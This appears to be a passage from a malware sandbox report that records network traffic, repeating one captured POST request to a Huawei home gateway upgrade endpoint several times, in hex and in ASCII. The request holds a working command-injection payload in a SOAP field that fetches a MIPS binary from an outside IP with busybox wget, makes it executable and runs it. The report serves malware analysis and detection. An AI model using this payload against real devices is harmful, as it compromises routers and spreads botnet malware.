s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo 